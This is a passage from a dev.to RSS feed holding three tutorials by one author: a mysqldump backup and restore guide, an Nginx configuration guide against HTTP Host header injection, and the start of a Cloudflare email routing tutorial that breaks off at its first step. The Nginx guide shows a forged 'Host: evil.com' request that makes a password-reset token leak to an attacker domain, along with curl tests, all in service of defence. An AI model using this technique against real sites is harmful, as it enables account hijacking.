&lt;li&gt;  &lt;strong&gt;-p[password]&lt;/strong&gt;: The password immediately follows &lt;code&gt;-p&lt;/code&gt; with no space in between. If you write only &lt;code&gt;-p&lt;/code&gt; without the password, the system prompts for interactive input (more secure).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;[database_name]&lt;/strong&gt; : Replace with the name of the target database to back up, e.g., “ecommerce_db”.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;&amp;gt; [output_file.sql]&lt;/strong&gt; : Uses a redirection symbol to write backup content into a specified SQL file. It’s recommended to use clear naming conventions.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;💡 &lt;strong&gt;Best Practice&lt;/strong&gt;: In production environments, avoid exposing passwords directly in the command line (they will be recorded in history). Instead, use &lt;code&gt;mysqldump -u username -p database_name &amp;gt; backup.sql&lt;/code&gt; and enter the password interactively afterward.&lt;/p&gt;
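
&lt;p&gt;Another way to keep passwords off the command line entirely is a MySQL option file. A minimal sketch, assuming a dedicated backup account (the file name and credentials below are placeholders):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# ~/.my.cnf (restrict access with: chmod 600 ~/.my.cnf)
[mysqldump]
user=backup_user
password=your_secure_password
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;With this file in place, &lt;code&gt;mysqldump ecommerce_db &amp;gt; backup.sql&lt;/code&gt; runs without prompting and without exposing the password in shell history.&lt;/p&gt;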

&lt;h2&gt;
  
  
  II. Common mysqldump Parameters: Key to On-Demand Backups
&lt;/h2&gt;

&lt;p&gt;Depending on business needs, you may only need to back up table structures, export data, or handle multiple databases simultaneously. mysqldump offers a rich set of parameter combinations to meet backup requirements for different scenarios.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Backup Structure + Data (Default Behavior)
&lt;/h3&gt;

&lt;p&gt;Without specifying special parameters, mysqldump automatically backs up both table structures (CREATE TABLE statements) and data (INSERT statements). This is ideal for full migrations or complete backups:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p ecommerce_db &amp;gt; ecommerce_full_backup.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.2 Backup Only Table Structure (No Data)
&lt;/h3&gt;

&lt;p&gt;When you need to replicate a database schema without actual data (e.g., setting up a test environment), add the &lt;code&gt;--no-data&lt;/code&gt; parameter:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p --no-data ecommerce_db &amp;gt; ecommerce_schema_only.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.3 Backup Only Data (No Structure)
&lt;/h3&gt;

&lt;p&gt;If the table structure already exists and you only need to update data (e.g., incremental supplements), use the &lt;code&gt;--no-create-info&lt;/code&gt; parameter to exclude table structure statements:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p --no-create-info ecommerce_db &amp;gt; ecommerce_data_only.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.4 Backup Multiple Databases
&lt;/h3&gt;

&lt;p&gt;To back up multiple independent databases at once, use the &lt;code&gt;--databases&lt;/code&gt; parameter and list the databases (separated by spaces):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p --databases ecommerce_db blog_db user_center &amp;gt; multi_db_backup.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.5 Backup All Databases
&lt;/h3&gt;

&lt;p&gt;For small servers or scenarios requiring full-server backups, use the &lt;code&gt;--all-databases&lt;/code&gt; parameter to back up all databases in MySQL with one command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p --all-databases &amp;gt; mysql_full_server_backup.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  III. Advanced mysqldump Tips: Boost Backup Efficiency &amp;amp; Security
&lt;/h2&gt;

&lt;p&gt;In real-world operations, basic backups alone may not meet performance, storage, or automation needs. The following advanced tips help optimize backup workflows for enterprise-level scenarios.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Add Timestamps to Backup Files
&lt;/h3&gt;

&lt;p&gt;Manually naming backup files can lead to version confusion. Embed a timestamp (year-month-day_hour-minute-second) using &lt;code&gt;$(date +%Y%m%d_%H%M%S)&lt;/code&gt; to enable automatic version management for backup files:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p ecommerce_db &amp;gt; ecommerce_backup_$(date +%Y%m%d_%H%M%S).sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After execution, a file like “ecommerce_backup_20251101_153045.sql” will be generated, making it easy to trace the backup time.&lt;/p&gt;
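
&lt;p&gt;The timestamped command pairs naturally with cron for automated, versioned backups. A hypothetical crontab entry (the schedule and paths are assumptions; note that &lt;code&gt;%&lt;/code&gt; must be escaped as &lt;code&gt;\%&lt;/code&gt; inside crontab):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Run daily at 02:30; credentials come from the [mysqldump] section of ~/.my.cnf
30 2 * * * mysqldump --single-transaction ecommerce_db | gzip &amp;gt; /backup/ecommerce_$(date +\%Y\%m\%d).sql.gz
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;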

&lt;h3&gt;
  
  
  3.2 Compress Backup Files to Reduce Storage Usage
&lt;/h3&gt;

&lt;p&gt;Backup files for large databases are often bulky. Use a pipe (&lt;code&gt;|&lt;/code&gt;) with &lt;code&gt;gzip&lt;/code&gt; for direct compression, which can save 70%-90% of storage space:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p ecommerce_db | gzip &amp;gt; ecommerce_backup_$(date +%Y%m%d).sql.gz
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To restore, first decompress: &lt;code&gt;gunzip ecommerce_backup_20251101.sql.gz&lt;/code&gt;, then run the restoration command.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.3 Exclude Specific Tables (Remove Redundant Data)
&lt;/h3&gt;

&lt;p&gt;Some tables (e.g., log tables, temporary tables) don’t require frequent backups. Use the &lt;code&gt;--ignore-table&lt;/code&gt; parameter to exclude them, in the format &lt;code&gt;--ignore-table=database_name.table_name&lt;/code&gt;. For multiple tables, repeat the parameter:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p ecommerce_db --ignore-table=ecommerce_db.access_log --ignore-table=ecommerce_db.temp_session &amp;gt; filtered_backup.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.4 Table Locking &amp;amp; Transaction Control (InnoDB Optimization)
&lt;/h3&gt;

&lt;p&gt;For InnoDB databases, add the &lt;code&gt;--single-transaction&lt;/code&gt; parameter to create a consistent snapshot during backups, avoiding table locks that disrupt business read/write operations:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p --single-transaction ecommerce_db &amp;gt; innodb_consistent_backup.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If using the MyISAM engine (which doesn’t support transactions), use &lt;code&gt;--lock-tables&lt;/code&gt; to lock backup tables and ensure data consistency.&lt;/p&gt;

&lt;h2&gt;
  
  
  IV. MySQL Backup Restoration Practice: From Backup File to Database
&lt;/h2&gt;

&lt;p&gt;The ultimate value of backups lies in restoration. Mastering the correct restoration process is the final line of defense for data security. MySQL restoration typically uses the &lt;code&gt;mysql&lt;/code&gt; command to execute the backed-up SQL file.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 Regular Restoration Steps
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt; Ensure the target database exists (if not, first run &lt;code&gt;CREATE DATABASE ecommerce_db;&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt; Execute the restoration command to import the SQL file into the database:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysql -u root -p ecommerce_db &amp;lt; ecommerce_full_backup.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.2 Direct Restoration from Compressed Files (No Decompression Needed)
&lt;/h3&gt;

&lt;p&gt;For .gz compressed backup files, you can use a pipe to decompress and restore directly, eliminating intermediate steps:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;gunzip -c ecommerce_backup_20251101.sql.gz | mysql -u root -p ecommerce_db
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.3 Restore to a New Database (Avoid Data Overwriting)
&lt;/h3&gt;

&lt;p&gt;To verify backup files or test restoration effectiveness, it’s recommended to restore to a newly created test database instead of overwriting the production database. Follow these steps:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; Create a test database: &lt;code&gt;mysql -u root -p -e "CREATE DATABASE ecommerce_test;"&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; Run the restoration: &lt;code&gt;mysql -u root -p ecommerce_test &amp;lt; ecommerce_full_backup.sql&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; Verify data: Log in to the test database to check table structures and data integrity, e.g., &lt;code&gt;mysql -u root -p ecommerce_test -e "SELECT COUNT(*) FROM orders;"&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  V. mysqldump Usage Notes &amp;amp; Risk Mitigation
&lt;/h2&gt;

&lt;p&gt;When using mysqldump in production environments, mastering operations is not enough—you must also address potential risks. Below are practice-proven key notes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Password Security Enhancement&lt;/strong&gt;: If the system keeps command history (e.g., the &lt;code&gt;history&lt;/code&gt; command in Linux), writing passwords directly on the command line leaks them. Beyond interactive input, you can store login credentials in the MySQL configuration file (my.cnf): add &lt;code&gt;user=backup_user&lt;/code&gt; and &lt;code&gt;password=your_secure_password&lt;/code&gt; lines under the &lt;code&gt;[mysqldump]&lt;/code&gt; section, and restrict the file with &lt;code&gt;chmod 600 my.cnf&lt;/code&gt; so other users cannot read it.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Principle of Least Privilege&lt;/strong&gt;: Avoid using the root account for backups. Create a dedicated backup account with only the minimum necessary permissions, for example: &lt;code&gt;GRANT SELECT, SHOW VIEW, LOCK TABLES, RELOAD ON *.* TO 'backup_user'@'localhost' IDENTIFIED BY 'secure_pass';&lt;/code&gt; (on MySQL 8.0+, &lt;code&gt;IDENTIFIED BY&lt;/code&gt; is no longer accepted inside GRANT; run &lt;code&gt;CREATE USER&lt;/code&gt; first, then GRANT). The RELOAD permission is used to flush logs, ensuring binary-log consistency during backups.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Performance Optimization for Large Databases&lt;/strong&gt;: For databases larger than 10GB, the default backup method may be time-consuming and memory-intensive. Add the &lt;code&gt;--quick&lt;/code&gt; parameter to make mysqldump stream rows from large tables one by one instead of loading whole result sets into memory. Combine it with &lt;code&gt;--extended-insert&lt;/code&gt; (enabled by default) to merge multiple INSERT statements, reducing backup file size and restoration time. It’s also recommended to run backups during off-peak hours (e.g., midnight) and use &lt;code&gt;nohup&lt;/code&gt; or background processes so terminal disconnections don’t interrupt the backup: &lt;code&gt;nohup mysqldump -u backup_user -p --single-transaction --quick ecommerce_db | gzip &amp;gt; backup_20251101.sql.gz &amp;amp;&lt;/code&gt; (when backgrounding, supply the password via a configuration file rather than the interactive &lt;code&gt;-p&lt;/code&gt; prompt, which cannot be answered once the job is in the background).
&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Backup File Verification &amp;amp; Storage&lt;/strong&gt;: After backup completion, in addition to checking file size, generate a checksum with &lt;code&gt;md5sum backup_20251101.sql.gz &amp;gt; backup_md5.txt&lt;/code&gt;. Before restoration, verify file integrity using &lt;code&gt;md5sum -c backup_md5.txt&lt;/code&gt;. For storage, sync backup files to offsite storage (e.g., cloud storage, FTP servers) to avoid losing backup files due to physical server failures.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Recommended Backup Strategy Combination&lt;/strong&gt;: mysqldump is suitable for full backups, but relying solely on full backups leads to long restoration times. It’s recommended to combine binary logs for “full + incremental” backups: Run a full backup once a week (e.g., Sunday), enable binary logs for the rest of the time, and back up log files incrementally. During restoration, first restore the full backup, then apply incremental logs via &lt;code&gt;mysqlbinlog&lt;/code&gt; to minimize data loss risks.&lt;/li&gt;
&lt;/ul&gt;
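
&lt;p&gt;The notes above can be pulled together into a single backup script. The following is a sketch under stated assumptions: the destination path, the credentials file, and the 14-day retention window are all placeholders to adapt, not part of the original article.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;#!/bin/bash
set -euo pipefail
STAMP=$(date +%Y%m%d_%H%M%S)
DEST=/backup/mysql
mkdir -p "$DEST"
# Consistent InnoDB snapshot, row-by-row reads, compressed output
mysqldump --defaults-extra-file=/etc/mysql/backup.cnf \
    --single-transaction --quick ecommerce_db \
    | gzip &amp;gt; "$DEST/ecommerce_${STAMP}.sql.gz"
# Checksum for later integrity verification
md5sum "$DEST/ecommerce_${STAMP}.sql.gz" &amp;gt; "$DEST/ecommerce_${STAMP}.md5"
# Drop backups older than 14 days
find "$DEST" -name 'ecommerce_*' -mtime +14 -delete
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;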

&lt;h2&gt;
  
  
  VI. Conclusion: Building a Reliable MySQL Backup System
&lt;/h2&gt;

&lt;p&gt;As the most basic and classic backup tool in the MySQL ecosystem, mysqldump’s flexibility and compatibility make it irreplaceable for small to medium-sized database scenarios. Through this article, we’ve built a complete mysqldump usage system—from parameter combinations for basic syntax to efficiency optimization with advanced tips, and risk control in restoration practice. However, it’s crucial to remember: &lt;strong&gt;the core goal of backups is recoverability&lt;/strong&gt;. Regular restoration testing (monthly is recommended) is more important than simply creating backups. Only through actual restoration verification can you ensure backup files are valid and restoration processes are smooth, truly safeguarding business data security.&lt;/p&gt;

</description>
      <category>mysql</category>
      <category>backup</category>
    </item>
    <item>
      <title>Nginx Defends HTTP Host Header Attacks Vulnerability: Practical Configuration Guide</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Wed, 05 Nov 2025 09:33:23 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/nginx-defends-http-host-header-attacks-vulnerability-practical-configuration-guide-36jc</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/nginx-defends-http-host-header-attacks-vulnerability-practical-configuration-guide-36jc</guid>
      <description>&lt;p&gt;As a web developer, have you ever overlooked the Host header in HTTP requests? This seemingly ordinary field, once exploited by attackers, can lead to serious security issues such as password reset hijacking, cache poisoning, and even Server-Side Request Forgery (SSRF). This article will start from the vulnerability principle and share 3 battle-tested Nginx defense configuration schemes to help you quickly build the first line of defense for your web application.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/nginx-defends-http-host-header-attacks-vulnerability-practical-configuration-guide.html" rel="noopener noreferrer"&gt;# Nginx Defends HTTP Host Header Attacks Vulnerability: Practical Configuration Guide&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8qw95gl1pjp2viq0koh3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8qw95gl1pjp2viq0koh3.png" width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  1. HTTP Host Header Attack (Host Header Injection): Why Is It So Dangerous?
&lt;/h2&gt;

&lt;p&gt;In the HTTP protocol, the Host header specifies the target domain name of the request. What many developers overlook is that &lt;strong&gt;the Host header is fully controlled by the client and must be treated as untrusted data&lt;/strong&gt;. Failing to validate it produces the &lt;strong&gt;HTTP Host Header Injection vulnerability&lt;/strong&gt;, usually rated medium-to-low severity but widely applicable and capable of triggering serious chain reactions. If the back-end application uses this field directly to generate URLs (such as password reset links or redirect addresses), it creates significant security risks.&lt;/p&gt;

&lt;p&gt;Take a typical scenario: A website’s password reset function generates a link through the following code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
$resetUrl = "https://" . $_SERVER['HTTP_HOST'] . "/reset?token=" . $token;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Attackers only need to construct the following request:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
GET /forgot-password HTTP/1.1
Host: evil.com
User-Agent: Mozilla/5.0...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The reset link received by the user will become &lt;code&gt;https://evil.com/reset?token=xxx&lt;/code&gt;. Once the user clicks, the sensitive token will be leaked to the attacker, leading to account theft. This attack method has extremely low cost but can cause fatal consequences. According to the OWASP Security Testing Guide, Host header injection vulnerabilities are often classified into the “Injection Attacks” category and are one of the common configuration vulnerabilities in web applications.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Core Defense Idea: Block Illegal Hosts at the Nginx Layer
&lt;/h2&gt;

&lt;p&gt;The key to defending against Host header attacks is &lt;strong&gt;not trusting the Host value passed by the client&lt;/strong&gt;. The best practice is to verify the legitimacy of the Host header in advance at the Nginx (reverse proxy layer) and only allow predefined legitimate domain names to pass. This can not only reduce the pressure on the back-end application but also block attacks from the source.&lt;/p&gt;

&lt;p&gt;Core principle: All Host headers entering the system must be in the whitelist; requests not in the whitelist will directly return 403 Forbidden.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. 3 Practical Nginx Defense Configuration Schemes
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Scheme 1: Single Domain Name Exact Match (Recommended, Clearest Logic)
&lt;/h3&gt;

&lt;p&gt;Applicable to scenarios with a single main domain name. It uses a flag variable to decide whether the Host is legitimate, working around the fact that Nginx &lt;code&gt;if&lt;/code&gt; blocks cannot be nested or combined.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
server {
    listen 80;
    server_name devresourcehub.com; # Your legitimate domain name

    # Host header attack protection configuration
    set $host_flag 0; # Initialize flag bit to 0 (illegal)
    if ($host = "devresourcehub.com") { # Match legitimate domain name (Nginx uses a single "=" for string comparison)
        set $host_flag 1; # Set flag bit to 1 (legal)
    }
    if ($host_flag = 0) { # Reject illegal Host directly
        return 403;
    }

    location / {
        root /www/h5;
        index index.php index.html index.htm;
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The advantage of this scheme is its simple logic and easy maintenance; even non-specialist operations staff can quickly understand and modify it.&lt;/p&gt;

&lt;h3&gt;
  
  
  Scheme 2: Multi-Domain Whitelist (Main Site + Subsite/Test Environment)
&lt;/h3&gt;

&lt;p&gt;If your application has multiple legitimate domain names (such as main site devresourcehub.com, subsite tools.devresourcehub.com, local test localhost), you can implement a whitelist using regular expressions or multi-condition judgment.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Method 1: Regular Expression Matching (Concise)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
server {
    listen 80;
    server_name devresourcehub.com;

    set $host_flag 0;
    # Regular expression matches multiple legitimate domain names, separated by |
    if ($host ~* "^(devresourcehub\.com|tools\.devresourcehub\.com|localhost)$") {set $host_flag 1;}
    if ($host_flag = 0) {return 403;}

    location / {
        root /www/h5;
        index index.php index.html index.htm;
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Method 2: Multi-Condition Judgment (Higher Readability)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
set $host_flag 0;
if ($host = "devresourcehub.com") {set $host_flag 1;}
if ($host = "tools.devresourcehub.com") {set $host_flag 1;}
if ($host = "localhost") {set $host_flag 1;}
if ($host_flag = 0) {return 403;}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
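
&lt;p&gt;As an alternative to chained &lt;code&gt;if&lt;/code&gt; blocks, the Nginx &lt;code&gt;map&lt;/code&gt; directive (declared in the http context) can express the whole whitelist in one place. A sketch equivalent to Method 2:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http {
    map $host $host_flag {
        default 0;  # any Host not listed below is illegal
        devresourcehub.com 1;
        tools.devresourcehub.com 1;
        localhost 1;
    }
    server {
        listen 80;
        server_name devresourcehub.com;
        if ($host_flag = 0) {return 403;}
        location / {
            root /www/h5;
            index index.php index.html index.htm;
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;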



&lt;h3&gt;
  
  
  Scheme 3: Regular Expression Matching IP + Domain Name (Special Scenarios)
&lt;/h3&gt;

&lt;p&gt;If you need to allow access from specific IP segments (such as internal network testing), you can combine IP and domain name for regular expression matching. But note: the more complex the regular expression, the higher the maintenance cost. Exact matching is preferred in the production environment.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
server {
    listen 80;
    server_name devresourcehub.com;

    # Allow domain name + specified IP segment + local loopback address
    if ($http_host !~* "^(devresourcehub\.com|192\.168\.10\.\d{1,3}|127\.0\.0\.1)$") {return 403;}

    location / {
        root /www/h5;
        index index.php index.html index.htm;
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note: The &lt;code&gt;.&lt;/code&gt; in the regular expression must be escaped as &lt;code&gt;\.&lt;/code&gt;, otherwise it matches any character; and &lt;code&gt;\d{1,3}&lt;/code&gt; only coarsely restricts the last octet (it also matches invalid values such as 999), so it cannot completely exclude illegal IPs.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. How to Verify Whether the Protection Takes Effect?
&lt;/h2&gt;

&lt;p&gt;After the configuration is completed, use the curl command to test two scenarios to ensure the protection takes effect:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Normal Access (Should Return 200)&lt;/strong&gt; : &lt;code&gt;curl -I -H "Host: devresourcehub.com" http://your-server-ip/&lt;/code&gt; Returns status code 200 OK, indicating that the legitimate Host passes.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Forged Host (Should Return 403)&lt;/strong&gt; : &lt;code&gt;curl -I -H "Host: evil.com" http://your-server-ip/&lt;/code&gt; Returns 403 Forbidden, indicating that the illegal Host is blocked.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  5. 2025 Host Header Defense Best Practices
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Back-End Does Not Depend on the Host Header&lt;/strong&gt;: Even with Nginx verification in place, the back end should build URLs from a fixed domain name in its configuration file, not from &lt;code&gt;$_SERVER['HTTP_HOST']&lt;/code&gt; or &lt;code&gt;$host&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Default Server Block Rejects Access&lt;/strong&gt;: Ensure that the default_server block of Nginx does not return any sensitive content. It is recommended to configure it as: &lt;code&gt;server {listen 80 default_server; return 444;}&lt;/code&gt; (444 means closing the connection without response).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Record Illegal Request Logs&lt;/strong&gt;: Log intercepted illegal requests so attack sources can be analyzed later: &lt;code&gt;if ($host_flag = 0) { access_log /var/log/nginx/host_attack.log; return 403; }&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Regularly Audit Configuration&lt;/strong&gt;: When the domain name is changed or added, update the Host whitelist of Nginx in time to avoid normal requests being blocked.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;HTTP Host header attack (Host Header Injection) is subtle but has extremely low defense cost. Through simple configuration at the Nginx layer, most attack attempts can be effectively blocked. It is recommended to use &lt;strong&gt;Scheme 1 (Single Domain Name Flag Bit)&lt;/strong&gt;  or &lt;strong&gt;Scheme 2 (Multi-Domain Exact Match)&lt;/strong&gt;  first, which takes into account both security and maintainability. Remember: The core of web security is “not trusting any client input”. Only by starting from the details can a truly solid defense system be built.&lt;/p&gt;

</description>
      <category>nginx</category>
      <category>http</category>
    </item>
    <item>
      <title>Cloudflare Custom Domain Email Tutorial: 3 Steps to Build a Professional Brand Email (with DNS Setup)</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Mon, 03 Nov 2025 09:42:14 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/cloudflare-custom-domain-email-tutorial-3-steps-to-build-a-professional-brand-email-with-dns-m3i</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/cloudflare-custom-domain-email-tutorial-3-steps-to-build-a-professional-brand-email-with-dns-m3i</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;Zero-cost Cloudflare Custom Domain Email Tutorial: Build professional brand emails like &lt;a href="mailto:contact@yourdomain.com"&gt;contact@yourdomain.com&lt;/a&gt; in 3 steps. Includes DNS setup guide, takes 10 mins for beginners, boosts trust for indie sites, blogs &amp;amp; SaaS products.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/cloudflare-custom-domain-email-tutorial-3-steps-to-build-a-professional-brand-email-with-dns-setup.html" rel="noopener noreferrer"&gt;Cloudflare Custom Domain Email Tutorial: 3 Steps to Build a Professional Brand Email (with DNS Setup)&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When running an independent website, personal blog, or SaaS product, are you still using personal email accounts like Gmail or Outlook for external communication? This actually hurts your brand professionalism significantly—imagine the trust gap when a customer receives a business email from &lt;a href="mailto:xxx@live.com"&gt;xxx@live.com&lt;/a&gt; versus one from &lt;a href="mailto:contact@yourdomain.com"&gt;contact@yourdomain.com&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Today, I’ll share a zero-cost method to set up a custom domain email using Cloudflare. It takes less than 10 minutes total, and even beginners can follow along.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Prerequisites: What You’ll Need
&lt;/h2&gt;

&lt;p&gt;There’s only one core requirement: &lt;strong&gt;a domain name already hosted on Cloudflare&lt;/strong&gt;. If your domain isn’t transferred yet, simply add it on the Cloudflare official website and follow the prompts to complete DNS resolution migration (there are plenty of tutorials online, and it’s not difficult to operate, so I won’t go into detail here).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fagva02gsf83rz805z3v0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fagva02gsf83rz805z3v0.png" width="800" height="412"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The image above shows my domain list in Cloudflare, where devresourcehub.com is the domain of this site.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Step-by-Step Guide: Set Up Custom Email in 3 Steps
&lt;/h2&gt;

&lt;p&gt;My domain is devresourcehub.com (which is also the address of my blog). Next, I’ll use this domain as an example to set up a custom email like &lt;a href="mailto:contact@devresourcehub.com"&gt;contact@devresourcehub.com&lt;/a&gt; step by step.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Access the Domain’s Email Routing Page
&lt;/h3&gt;

